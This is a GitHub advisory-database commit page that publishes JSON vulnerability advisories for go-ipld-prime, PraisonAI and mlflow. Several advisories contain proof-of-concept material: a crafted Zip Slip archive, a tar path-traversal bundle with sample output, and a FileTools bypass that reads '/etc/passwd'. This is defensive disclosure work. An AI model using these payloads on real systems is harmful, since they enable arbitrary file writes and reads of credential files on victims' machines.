Skip to content

Commit 8022ffb

Browse files
advisory-database[bot]advisory-database[bot]
committed
Publish Advisories
GHSA-378j-3jfj-8r9f GHSA-4ph2-f6pf-79wv GHSA-4rx4-4r3x-6534 GHSA-693f-pf34-72c5 GHSA-7qhf-v65m-g5f3 GHSA-jfxc-v5g9-38xr GHSA-qpc3-8vqg-8g6w GHSA-r9x3-wx45-2v7f
1 parent 2d2992c commit 8022ffb

8 files changed

Lines changed: 439 additions & 10 deletions

File tree

advisories/github-reviewed/2026/04/GHSA-378j-3jfj-8r9f/GHSA-378j-3jfj-8r9f.json

Lines changed: 65 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,65 @@
1+
{
2+
"schema_version": "1.4.0",
3+
"id": "GHSA-378j-3jfj-8r9f",
4+
"modified": "2026-04-06T23:08:24Z",
5+
"published": "2026-04-06T23:08:24Z",
6+
"aliases": [
7+
"CVE-2026-35480"
8+
],
9+
"summary": "go-ipld-prime: DAG-CBOR decoder unbounded memory allocation from CBOR headers",
10+
"details": "The DAG-CBOR decoder uses collection sizes declared in CBOR headers as Go preallocation hints for maps and lists. The decoder does not cap these size hints or account for their cost in its allocation budget, allowing small payloads to cause excessive memory allocation.\n\nA CBOR map or list header can declare an arbitrarily large number of entries, causing the decoder to preallocate proportionally large backing structures before any entries are actually read. Because the allocation budget is only decremented as entries are decoded (not when sizes are declared), this cost is effectively invisible to the budget system. This is compounded by nesting: each level of a nested structure triggers its own unchecked preallocation while consuming minimal budget (one entry per parent level), so a payload under 100 bytes with 10 levels of nesting can cause over 9GB of allocation.\n\nSchema-free decoding (i.e. using `basicnode.Prototype.Any`) allows arbitrary nesting depth. Schema-bound decoding limits nesting to the schema's structure, but any field typed as `Any` in the schema permits unconstrained nesting within that field.\n\nThe fix caps the preallocation size hint to 1024 entries and decrements the allocation budget when collection sizes are declared. The declared length is still used for entry-count validation, and collections grow dynamically as entries are decoded, so correctly-formed data is unaffected, even beyond the preallocation limit.",
11+
"severity": [
12+
{
13+
"type": "CVSS_V3",
14+
"score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
15+
}
16+
],
17+
"affected": [
18+
{
19+
"package": {
20+
"ecosystem": "Go",
21+
"name": "github.com/ipld/go-ipld-prime"
22+
},
23+
"ranges": [
24+
{
25+
"type": "ECOSYSTEM",
26+
"events": [
27+
{
28+
"introduced": "0"
29+
},
30+
{
31+
"fixed": "0.22.0"
32+
}
33+
]
34+
}
35+
]
36+
}
37+
],
38+
"references": [
39+
{
40+
"type": "WEB",
41+
"url": "https://github.com/ipld/go-ipld-prime/security/advisories/GHSA-378j-3jfj-8r9f"
42+
},
43+
{
44+
"type": "WEB",
45+
"url": "https://github.com/ipld/go-ipld-prime/commit/e43bf4a27055fe8d895671a731ee5041e2d983a9"
46+
},
47+
{
48+
"type": "PACKAGE",
49+
"url": "https://github.com/ipld/go-ipld-prime"
50+
},
51+
{
52+
"type": "WEB",
53+
"url": "https://github.com/ipld/go-ipld-prime/releases/tag/v0.22.0"
54+
}
55+
],
56+
"database_specific": {
57+
"cwe_ids": [
58+
"CWE-770"
59+
],
60+
"severity": "MODERATE",
61+
"github_reviewed": true,
62+
"github_reviewed_at": "2026-04-06T23:08:24Z",
63+
"nvd_published_at": null
64+
}
65+
}

advisories/github-reviewed/2026/04/GHSA-4ph2-f6pf-79wv/GHSA-4ph2-f6pf-79wv.json

Lines changed: 64 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,64 @@
1+
{
2+
"schema_version": "1.4.0",
3+
"id": "GHSA-4ph2-f6pf-79wv",
4+
"modified": "2026-04-06T23:08:55Z",
5+
"published": "2026-04-06T23:08:55Z",
6+
"aliases": [
7+
"CVE-2026-39307"
8+
],
9+
"summary": "PraisonAI Has Arbitrary File Write (Zip Slip) in Templates Extraction",
10+
"details": "The PraisonAI templates installation feature is vulnerable to a \"Zip Slip\" Arbitrary File Write attack. When downloading and extracting template archives from external sources (e.g., GitHub), the application uses Python's `zipfile.extractall()` without verifying if the files within the archive resolve outside of the intended extraction directory. \n\n### Details\nLocation: `src/praisonai/praisonai/cli/features/templates.py` (Line 852)\n\nVulnerable Code snippet:\n```python\nzip_ref.extractall(tmpdir)\n```\n\nDuring installation, the CLI downloads a ZIP archive and extracts it directly into a temporary directory using `zip_ref.extractall(tmpdir)`. A specially crafted ZIP archive can contain file entries with relative paths (such as `../../../../tmp/evil.sh`). If extracting this archive in older Python versions or environments where extraction rules aren't strict, `extractall` will write these files outside the target directory, allowing an attacker to overwrite arbitrary files on the victim's filesystem.\n\n### PoC\n1. Generate a malicious zip payload:\n```python\nimport zipfile\n\nwith zipfile.ZipFile('malicious_template.zip', 'w') as z:\n # Adding a file that traverses directories\n z.writestr('../../../../../../../tmp/zip_slip_pwned.txt', 'pwned by zip slip')\n```\n2. Trick a user into installing the malicious template:\n```bash\npraisonai templates install github:attacker/malicious_template\n```\n3. Observe the `zip_slip_pwned.txt` file created in `/tmp/` on the victim's machine.\n\n### Impact\nThis is an Arbitrary File Write vulnerability affecting any user who installs community templates. It can be leveraged to overwrite system files, user dotfiles, or application code, ultimately leading to system corruption or full Remote Code Execution (RCE).",
11+
"severity": [
12+
{
13+
"type": "CVSS_V3",
14+
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:H"
15+
}
16+
],
17+
"affected": [
18+
{
19+
"package": {
20+
"ecosystem": "PyPI",
21+
"name": "PraisonAI"
22+
},
23+
"ranges": [
24+
{
25+
"type": "ECOSYSTEM",
26+
"events": [
27+
{
28+
"introduced": "0"
29+
},
30+
{
31+
"fixed": "4.5.113"
32+
}
33+
]
34+
}
35+
],
36+
"database_specific": {
37+
"last_known_affected_version_range": "<= 4.5.112"
38+
}
39+
}
40+
],
41+
"references": [
42+
{
43+
"type": "WEB",
44+
"url": "https://github.com/MervinPraison/PraisonAI/security/advisories/GHSA-4ph2-f6pf-79wv"
45+
},
46+
{
47+
"type": "PACKAGE",
48+
"url": "https://github.com/MervinPraison/PraisonAI"
49+
},
50+
{
51+
"type": "WEB",
52+
"url": "https://github.com/MervinPraison/PraisonAI/releases/tag/v4.5.113"
53+
}
54+
],
55+
"database_specific": {
56+
"cwe_ids": [
57+
"CWE-23"
58+
],
59+
"severity": "HIGH",
60+
"github_reviewed": true,
61+
"github_reviewed_at": "2026-04-06T23:08:55Z",
62+
"nvd_published_at": null
63+
}
64+
}

advisories/github-reviewed/2026/04/GHSA-4rx4-4r3x-6534/GHSA-4rx4-4r3x-6534.json

Lines changed: 64 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,64 @@
1+
{
2+
"schema_version": "1.4.0",
3+
"id": "GHSA-4rx4-4r3x-6534",
4+
"modified": "2026-04-06T23:09:12Z",
5+
"published": "2026-04-06T23:09:12Z",
6+
"aliases": [
7+
"CVE-2026-39306"
8+
],
9+
"summary": "PraisonAI recipe registry pull path traversal writes files outside the chosen output directory",
10+
"details": "### Summary\n\nPraisonAI's recipe registry pull flow extracts attacker-controlled `.praison` tar archives with `tar.extractall()` and does not validate archive member paths before extraction. A malicious publisher can upload a recipe bundle that contains `../` traversal entries and any user who later pulls that recipe will write files outside the output directory they selected.\n\nThis is a path traversal / arbitrary file write vulnerability on the client side of the recipe registry workflow. It affects both the local registry pull path and the HTTP registry pull path. The checksum verification does not prevent exploitation because the malicious traversal payload is part of the signed bundle itself.\n\n### Details\n\nThe issue is caused by unsafe extraction of tar archive contents during recipe pull.\n\n1. A malicious publisher creates a valid `.praison` bundle whose `manifest.json` is benign enough to pass publish, but whose tar members include traversal entries such as:\n\n```text\n../../escape-http.txt\n```\n\n2. `LocalRegistry.publish()` in `src/praisonai/praisonai/recipe/registry.py:214-287` only reads `manifest.json`, calculates a checksum, and stores the uploaded bundle. It does not inspect or sanitize the rest of the tar members before saving the archive.\n\n3. When a victim later pulls the recipe from a local registry, `LocalRegistry.pull()` in `src/praisonai/praisonai/recipe/registry.py:289-345` extracts the tarball directly:\n\n```python\nrecipe_dir = output_dir / name\nrecipe_dir.mkdir(parents=True, exist_ok=True)\n\nwith tarfile.open(bundle_path, \"r:gz\") as tar:\n tar.extractall(recipe_dir)\n```\n\n4. The HTTP client path is also vulnerable. `HttpRegistry.pull()` in `src/praisonai/praisonai/recipe/registry.py:691-739` downloads the bundle and then performs the same unsafe extraction:\n\n```python\nrecipe_dir = output_dir / name\nrecipe_dir.mkdir(parents=True, exist_ok=True)\n\nwith tarfile.open(bundle_path, \"r:gz\") as tar:\n tar.extractall(recipe_dir)\n```\n\n5. Because no archive member validation is performed, traversal entries escape `recipe_dir` and create files elsewhere on disk.\n\nVerified vulnerable behavior:\n\n- Published recipe name: `evil-http`\n- Victim-selected output directory: `/tmp/praisonai-pull-traversal-poc/victim-output`\n- Artifact created outside that directory: `/tmp/praisonai-pull-traversal-poc/escape-http.txt`\n- Artifact contents: `owned over http`\n\nThis demonstrates that a remote publisher can cause filesystem writes outside the pull destination chosen by another user.\n\n### PoC\n\nRun the single verification script from the checked-out repository:\n\n```bash\ncd \"/Users/r1zzg0d/Documents/CVE hunting/targets/PraisonAI\"\npython3 tmp/pocs/poc2.py\n```\n\nExpected vulnerable output:\n\n```text\n[+] Publish result: {'ok': True, 'name': 'evil-http', 'version': '1.0.0', ...}\n[+] Pull result: {'name': 'evil-http', 'version': '1.0.0', ...}\n[+] Outside artifact exists: True\n[+] Artifact also inside output dir: False\n[+] Outside artifact content: 'owned over http\\n'\n[+] RESULT: VULNERABLE - pulling the recipe created a file outside the chosen output directory.\n```\n\nThen verify the created file manually:\n\n```bash\nls -l /tmp/praisonai-pull-traversal-poc/escape-http.txt\ncat /tmp/praisonai-pull-traversal-poc/escape-http.txt\nfind /tmp/praisonai-pull-traversal-poc -maxdepth 3 | sort\n```\n\nWhat the script does internally:\n\n1. Starts a local PraisonAI recipe registry server.\n2. Builds a malicious `.praison` bundle containing the tar entry `../../escape-http.txt`.\n3. Publishes the malicious bundle to the local HTTP registry.\n4. Simulates a victim pulling that recipe into `/tmp/praisonai-pull-traversal-poc/victim-output`.\n5. Confirms that the file is created outside the chosen output directory.\n\n### Impact\n\nThis is a path traversal / arbitrary file write vulnerability in the recipe pull workflow.\n\nImpacted parties:\n\n- Users who pull recipes from an untrusted or shared PraisonAI registry.\n- Teams running internal registries where one publisher can influence what other users pull.\n- Automated systems or CI jobs that fetch recipes into working directories near sensitive project files.\n\nSecurity impact:\n\n- Integrity impact is high because an attacker can create or overwrite files outside the expected extraction directory.\n- Availability impact is significant if the overwritten target is a config file, project file, startup script, or another operational artifact.\n- The issue crosses a real security boundary because the attacker only needs to publish a malicious recipe, while the victim triggers the write by pulling it.\n\n### Remediation\n\n1. Replace raw `tar.extractall()` with a safe extraction routine that validates every `TarInfo` member before extraction. Reject absolute paths, `..` segments, and any resolved path that escapes the intended extraction directory.\n\n2. Apply the same archive member validation in both `LocalRegistry.pull()` and `HttpRegistry.pull()` so that local and remote registry clients share the same safety guarantees.\n\n3. Consider validating tar contents during publish as well, so malicious bundles are rejected before they ever enter the registry and cannot be served to downstream users.",
11+
"severity": [
12+
{
13+
"type": "CVSS_V3",
14+
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:H/A:H"
15+
}
16+
],
17+
"affected": [
18+
{
19+
"package": {
20+
"ecosystem": "PyPI",
21+
"name": "PraisonAI"
22+
},
23+
"ranges": [
24+
{
25+
"type": "ECOSYSTEM",
26+
"events": [
27+
{
28+
"introduced": "0"
29+
},
30+
{
31+
"fixed": "4.5.113"
32+
}
33+
]
34+
}
35+
],
36+
"database_specific": {
37+
"last_known_affected_version_range": "<= 4.5.112"
38+
}
39+
}
40+
],
41+
"references": [
42+
{
43+
"type": "WEB",
44+
"url": "https://github.com/MervinPraison/PraisonAI/security/advisories/GHSA-4rx4-4r3x-6534"
45+
},
46+
{
47+
"type": "PACKAGE",
48+
"url": "https://github.com/MervinPraison/PraisonAI"
49+
},
50+
{
51+
"type": "WEB",
52+
"url": "https://github.com/MervinPraison/PraisonAI/releases/tag/v4.5.113"
53+
}
54+
],
55+
"database_specific": {
56+
"cwe_ids": [
57+
"CWE-22"
58+
],
59+
"severity": "HIGH",
60+
"github_reviewed": true,
61+
"github_reviewed_at": "2026-04-06T23:09:12Z",
62+
"nvd_published_at": null
63+
}
64+
}

advisories/github-reviewed/2026/04/GHSA-693f-pf34-72c5/GHSA-693f-pf34-72c5.json

Lines changed: 64 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,64 @@
1+
{
2+
"schema_version": "1.4.0",
3+
"id": "GHSA-693f-pf34-72c5",
4+
"modified": "2026-04-06T23:09:28Z",
5+
"published": "2026-04-06T23:09:28Z",
6+
"aliases": [
7+
"CVE-2026-35615"
8+
],
9+
"summary": "PraisonAI Has Path Traversal in FileTools",
10+
"details": "### Executive Summary:\nThe path validation has a critical logic bug: it checks for `..` AFTER `normpath()` has already collapsed all `..` sequences. This makes the check completely useless and allows trivial path traversal to any file on the system.\nThe path validation function also does not resolve the symlink wich could potentially cause path traversal.\n\n### Details:\n`_validate_path()` calls `os.path.normpath()` first, which collapses `..` sequences, then checks for `'..'` in normalized. Since `..` is already collapsed, the check always passes.\n\n**Vulnerable File:**\n`src/praisonai-agents/praisonaiagents/tools/file_tools.py`\n\n**Lines:**\n42-49\n\n```python\nclass FileTools:\n \"\"\"Tools for file operations including read, write, list, and information.\"\"\"\n \n @staticmethod\n def _validate_path(filepath: str) -> str:\n # Normalize the path\n normalized = os.path.normpath(filepath)\n absolute = os.path.abspath(normalized)\n \n # Check for path traversal attempts (.. after normalization)\n # We check the original input for '..' to catch traversal attempts\n if '..' in normalized:\n raise ValueError(f\"Path traversal detected: {filepath}\")\n \n return absolute\n```\n\n**Severity:** CRITICAL\n\n**CVSS v3.1:** 9.2 (CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:H/SI:N/SA:N\n\n**CWE:** CWE-22: Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')\n\n### Proof of concept (PoC)\n\n**Prerequisites:**\n- Ability to specify a file path can call file operations\n\n**Steps to reproduce:**\npoc.py\n```python\nfrom praisonaiagents.tools.file_tools import FileTools\n\nprint(FileTools._validate_path('/tmp/../etc/passwd'))\n# Returns: /etc/passwd\n\nprint(FileTools.read_file('/tmp/../etc/passwd'))\n# Returns: content of /etc/passwd\n```\n\n**Why this works:**\n```python\n# Current vulnerable code:\nnormalized = os.path.normpath(filepath) # Collapses .. HERE\nabsolute = os.path.abspath(normalized)\nif '..' in normalized: # Check AFTER collapse - ALWAYS FALSE!\n raise ValueError(...)\n```\n\n### Impact:\n- **Complete bypass** of path traversal protection\n- Access to ANY file on the system with path from any starting directory\n- Read sensitive files: `/etc/passwd`, `/etc/shadow`, `~/.ssh/id_rsa`\n- Write arbitrary files if combined with write operations\n- Affect file operations `read_file`, `write_file`, `list_files`, `get_file_info`, `copy_file`, `move_file`, `delete_file`, `download_file`\n\n\n### Additional Notes:\n- **Fix:** Check for `'..' in filepath` BEFORE calling `normpath()`, not after\n- `_validate_path` uses `os.path.normpath` and `os.path.abspath`, which don't resolve symlinks, making it vulnerable to path traversal via symlink if attacker can control the symlink.",
11+
"severity": [
12+
{
13+
"type": "CVSS_V4",
14+
"score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:H/SI:N/SA:N"
15+
}
16+
],
17+
"affected": [
18+
{
19+
"package": {
20+
"ecosystem": "PyPI",
21+
"name": "PraisonAI"
22+
},
23+
"ranges": [
24+
{
25+
"type": "ECOSYSTEM",
26+
"events": [
27+
{
28+
"introduced": "0"
29+
},
30+
{
31+
"fixed": "1.5.113"
32+
}
33+
]
34+
}
35+
],
36+
"database_specific": {
37+
"last_known_affected_version_range": "<= 1.5.112"
38+
}
39+
}
40+
],
41+
"references": [
42+
{
43+
"type": "WEB",
44+
"url": "https://github.com/MervinPraison/PraisonAI/security/advisories/GHSA-693f-pf34-72c5"
45+
},
46+
{
47+
"type": "PACKAGE",
48+
"url": "https://github.com/MervinPraison/PraisonAI"
49+
},
50+
{
51+
"type": "WEB",
52+
"url": "https://github.com/MervinPraison/PraisonAI/releases/tag/v4.5.113"
53+
}
54+
],
55+
"database_specific": {
56+
"cwe_ids": [
57+
"CWE-22"
58+
],
59+
"severity": "CRITICAL",
60+
"github_reviewed": true,
61+
"github_reviewed_at": "2026-04-06T23:09:28Z",
62+
"nvd_published_at": null
63+
}
64+
}

advisories/unreviewed/2026/04/GHSA-7qhf-v65m-g5f3/GHSA-7qhf-v65m-g5f3.json renamed to advisories/github-reviewed/2026/04/GHSA-7qhf-v65m-g5f3/GHSA-7qhf-v65m-g5f3.json

Lines changed: 29 additions & 4 deletions
Original file line numberDiff line numberDiff line change
@@ -1,24 +1,49 @@
11
{
22
"schema_version": "1.4.0",
33
"id": "GHSA-7qhf-v65m-g5f3",
4-
"modified": "2026-04-03T18:31:23Z",
4+
"modified": "2026-04-06T23:08:07Z",
55
"published": "2026-04-03T18:31:23Z",
66
"aliases": [
77
"CVE-2026-0545"
88
],
9+
"summary": "mlflow: FastAPI job endpoints under `/ajax-api/3.0/jobs/*` are not protected by authentication or authorization",
910
"details": "In mlflow/mlflow, the FastAPI job endpoints under `/ajax-api/3.0/jobs/*` are not protected by authentication or authorization when the `basic-auth` app is enabled. This vulnerability affects the latest version of the repository. If job execution is enabled (`MLFLOW_SERVER_ENABLE_JOB_EXECUTION=true`) and any job function is allowlisted, any network client can submit, read, search, and cancel jobs without credentials, bypassing basic-auth entirely. This can lead to unauthenticated remote code execution if allowed jobs perform privileged actions such as shell execution or filesystem changes. Even if jobs are deemed safe, this still constitutes an authentication bypass, potentially resulting in job spam, denial of service (DoS), or data exposure in job results.",
1011
"severity": [
1112
{
1213
"type": "CVSS_V3",
1314
"score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N"
1415
}
1516
],
16-
"affected": [],
17+
"affected": [
18+
{
19+
"package": {
20+
"ecosystem": "PyPI",
21+
"name": "mlflow"
22+
},
23+
"ranges": [
24+
{
25+
"type": "ECOSYSTEM",
26+
"events": [
27+
{
28+
"introduced": "0"
29+
},
30+
{
31+
"last_affected": "3.10.1"
32+
}
33+
]
34+
}
35+
]
36+
}
37+
],
1738
"references": [
1839
{
1940
"type": "ADVISORY",
2041
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-0545"
2142
},
43+
{
44+
"type": "PACKAGE",
45+
"url": "https://github.com/mlflow/mlflow"
46+
},
2247
{
2348
"type": "WEB",
2449
"url": "https://huntr.com/bounties/b2e5b028-9541-4d29-8703-a76f1a3734d8"
@@ -29,8 +54,8 @@
2954
"CWE-306"
3055
],
3156
"severity": "CRITICAL",
32-
"github_reviewed": false,
33-
"github_reviewed_at": null,
57+
"github_reviewed": true,
58+
"github_reviewed_at": "2026-04-06T23:08:07Z",
3459
"nvd_published_at": "2026-04-03T18:16:21Z"
3560
}
3661
}

0 commit comments

Comments
 (0)